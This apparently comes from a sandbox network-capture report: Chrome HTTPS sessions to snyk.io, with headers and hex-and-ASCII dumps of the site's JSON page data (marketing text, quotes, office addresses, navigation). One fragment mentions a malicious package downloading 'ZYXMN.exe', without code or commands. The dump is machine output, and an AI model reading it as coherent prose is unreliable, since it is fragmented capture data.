                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC1007INData Raw: 69 74 73 20 68 69 67 68 20 61 6e 64 20 63 72 69 74 69 63 61 6c 20 73 65 76 65 72 69 74 79 20 6f 70 65 6e 20 63 6f 6e 74 61 69 6e 65 72 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 69 65 73 20 62 79 20 36 35 25 20 61 6e 64 20 33 39 25 20 72 65 73 70 65 63 74 69 76 65 6c 79 20 69 6e 20 6a 75 73 74 20 61 20 66 65 77 20 6d 6f 6e 74 68 73 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 e2 80 9c 57 65 e2 80 99 72 65 20 6e 6f 77 20 61 63 63 6f 75 6e 74 69
                                                                                                                                                                                                                                                                                                              Data Ascii: its high and critical severity open container vulnerabilities by 65% and 39% respectively in just a few months.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Were now accounti
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 e2 80 9c 49 74 e2 80 99 73 20 62 65 65 6e 20 67 72 65 61 74 20 74 6f 20 73 65 65 20 53 6e 79 6b 20 73 74 61 72 74 20 61 64 64 69 6e 67 20 61 64 64 69 74 69 6f 6e 61 6c 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 69 6e 67 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 74 6f 20 68 65 6c 70 20 75 73 20 6f 75 74 2c e2 80 9d 20 52 61 74 6e 65 72 20 63 6f 6e 63 6c 75 64 65 64 2e 20 e2 80 9c 54 68 65 20 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ext"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Its been great to see Snyk start adding additional features and improving documentation to help us out, Ratner concluded. The i
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC12INData Raw: 61 67 20 69 73 73 75 65 73 20 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ag issues
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 61 74 20 74 68 65 20 72 69 67 68 74 20 74 69 6d 65 20 77 69 74 68 20 74 68 65 20 72 69 67 68 74 20 63 6f 6e 74 65 78 74 75 61 6c 20 69 6e 73 69 67 68 74 73 2c 20 65 6d 70 6f 77 65 72 69 6e 67 20 74 68 65 6d 20 74 6f 20 6d 61 6b 65 20 71 75 69 63 6b 65 72 20 64 65 63 69 73 69 6f 6e 73 20 61 6e 64 20 6b 65 65 70 20 74 68 65 20 63 6f 6d 70 61 6e 79 20 73 65 63 75 72 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000at the right time with the right contextual insights, empowering them to make quicker decisions and keep the company secure.","nodeType":"text"}],"nodeType":"paragraph"},{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 6e 2d 55 53 22 7d 2c 22 66 69 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: n-US"},"fi
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 38 36 43 33 0d 0a 65 6c 64 73 22 3a 7b 22 6f 66 66 69 63 65 4e 61 6d 65 22 3a 22 53 69 6e 67 61 70 6f 72 65 22 2c 22 61 64 64 72 65 73 73 22 3a 22 33 20 54 65 6d 61 73 65 6b 20 41 76 65 6e 75 65 5c 6e 43 65 6e 74 65 6e 6e 69 61 6c 20 54 6f 77 65 72 2c 20 23 31 37 2d 33 39 5c 6e 53 69 6e 67 61 70 6f 72 65 20 30 33 39 31 39 30 22 2c 22 69 73 48 75 62 22 3a 74 72 75 65 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 6d 52
                                                                                                                                                                                                                                                                                                              Data Ascii: 000086C3elds":{"officeName":"Singapore","address":"3 Temasek Avenue\nCentennial Tower, #17-39\nSingapore 039190","isHub":true}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7mR
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 62 72 61 72 79 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 6c 69 62 72 61 72 79 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 7a 32 57 70 47 4e 55 42 62 71 48 50 39 5a 43 74 50 4b 30 38 73 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 75 73 74 6f 6d 65 72 20 72 65 73 6f 75 72 63 65 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 75 73 74 6f 6d 65 72 2d 72 65 73 6f 75 72 63 65 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e
                                                                                                                                                                                                                                                                                                              Data Ascii: brary/","appearance":{"navItem":{"icon":"library"}}},{"sys":{"id":"3z2WpGNUBbqHP9ZCtPK08s","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Customer resources","description":null,"url":"/customer-resources/","appearance":{"navItem":{"icon


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              134192.168.2.54989923.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC618OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/services.json?slug=services HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ga5vvn8d2k1a74"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/services.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::tx7k7-1729799355457-b2b7a887ebe0
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799355.1f616f3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15762INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 59 5a 48 55 42 57 61 51 65 37 49 49 58 75 70 37 31 35 51 74 6e 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 31 2d 31 37 54 31 39 3a 32 35 3a 35 30 2e 35 36 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 31 32 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3YZHUBWaQe7IIXup715Qtn","type":"Entry","createdAt":"2023-01-17T19:25:50.560Z","updatedAt":"2024-03-12T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15999INData Raw: 69 6e 67 20 73 65 73 73 69 6f 6e 73 22 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 35 6b 67 69 50 49 67 75 78 5a 56 46 6b 41 45 78 55 70 71 76 71 48 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 31 2d 33 31 54 31 36 3a 34 37 3a 34 34 2e 34 31 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 31 32 54 31 34 3a 34 39 3a 32 37 2e 34 36 38 5a 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: ing sessions"}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5kgiPIguxZVFkAExUpqvqH","type":"Entry","createdAt":"2024-01-31T16:47:44.416Z","updatedAt":"2024-03-12T14:49:27.468Z",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 74 57 50 30 78 61 4c 61 64 33 58 68 38 64 4b 79 34 69 54 71 77 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 31 36 54 30 31 3a 30 34 3a 31 37 2e 33 38 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 31 32 54 31 34 3a 34 39 3a 32 38 2e 33 30 30 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: {"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7tWP0xaLad3Xh8dKy4iTqw","type":"Entry","createdAt":"2022-11-16T01:04:17.380Z","updatedAt":"2024-03-12T14:49:28.300Z","environment":{"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC1019INData Raw: 6e 20 72 69 73 6b 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4d 6f 6c 65 63 75 6c 65 54 69 74 6c 65 54 65 78 74 44 65 73 63 72 69 70 74 69 6f 6e 22 7d 2c 22 6d 69 6e 69 48 65 61 64 65 72 22 3a 6e 75 6c 6c 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 54 68 65 20 64 65 76 65 6c 6f 70 65 72 20 73 65 63 75 72 69 74 79 20 70 6c 61 74 66 6f 72 6d 22 2c 22 61 63 74 69 6f 6e 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4d 6f 6c 65 63 75 6c 65 54 69 74 6c 65 54 65 78 74 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b
                                                                                                                                                                                                                                                                                                              Data Ascii: n risk.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"__typename":"MoleculeTitleTextDescription"},"miniHeader":null,"headline":"The developer security platform","actions":{"__typename":"MoleculeTitleTextActionsCollection","items":[
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC10742INData Raw: 30 30 30 30 32 39 45 41 0d 0a 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 65 72 76 69 63 65 73 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 31 78 33 6c 4e 77 6e 66 78 4f 69 30 67 4a 31 42 6f 41 6c 43 38 64 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 4f 75 72 20 63 75 73 74 6f 6d 65 72 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 75 73 74 6f 6d 65 72 73 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 63 75 73 74 6f 6d 65 72 73 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 000029EAppearance":{"navItem":{"icon":"services"}}},{"sys":{"id":"1x3lNwnfxOi0gJ1BoAlC8d","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Our customers","description":null,"url":"/customers/","appearance":{"navItem":{"icon":"customers"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              135192.168.2.54989623.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC467OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligence HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"vop2dsvz2x4by7"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::2fcxt-1729799355453-d172c1a3c488
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:15 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799355.10961c7
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC15740INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 34 4a 67 69 65 41 70 54 34 46 78 56 68 42 6a 56 65 4c 6f 7a 67 75 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 39 3a 34 33 3a 30 33 2e 32 30 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4JgieApT4FxVhBjVeLozgu","type":"Entry","createdAt":"2022-11-09T19:43:03.207Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC8848INData Raw: 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 32 2d 31 35 54 30 30 3a 31 35 3a 33 36 2e 33 34 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 37 54 31 37 3a 30 34 3a 34 39 2e 32 32 38 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 36 2c 22 72 65 76 69 73 69 6f 6e 22 3a 34 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: "createdAt":"2023-02-15T00:15:36.346Z","updatedAt":"2023-06-07T17:04:49.228Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":6,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:15 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 75 72 61 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 67 6f 6f 67 6c 65 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 31 37 2d 30 39 2d 30 38 54 31 32 3a 31 30 3a 33 31 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 35 30 34 38 37 32 36 33 31 2f 63 75 73 74 6f 6d 65 72 2d 6c 6f 67 6f 73 2f 67 6f 6f 67 6c 65 2e 73 76 67 22 2c 22 6f 72 69 67 69 6e 61 6c 5f 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000uration":null,"metadata":[],"public_id":"customer-logos/google","created_at":"2017-09-08T12:10:31Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1504872631/customer-logos/google.svg","original_url":"http://res.cloudinary.com/snyk/
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC8204INData Raw: 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 42 69 69 61 69 6a 54 59 51 31 34 52 61 7a 66 46 67 38 55 4d 63 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 38 54 31 35 3a 35 38 3a 32 34 2e 32 34 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 35 2d 33 30 54 30 34 3a 31 35 3a 32 31 2e 38 31 36 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 34 33 31 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: e":"Space","id":"oyrbri43adzz"}},"id":"BiiaijTYQ14RazfFg8UMc","type":"Entry","createdAt":"2022-11-08T15:58:24.247Z","updatedAt":"2024-05-30T04:15:21.816Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":431,
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 74 72 69 65 73 20 74 6f 20 64 6f 77 6e 6c 6f 61 64 20 74 77 6f 20 62 69 6e 61 72 69 65 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 2c 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 63 6f 64 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 5a 59 58 4d 4e 2e 65 78 65 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"tries to download two binaries","nodeType":"text"},{"data":{},"marks":[],"value":", ","nodeType":"text"},{"data":{},"marks":[{"type":"code"}],"value":"ZYXMN.exe","nodeType":"text
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC12INData Raw: 70 65 22 3a 22 74 61 62 6c 65 0d 0a
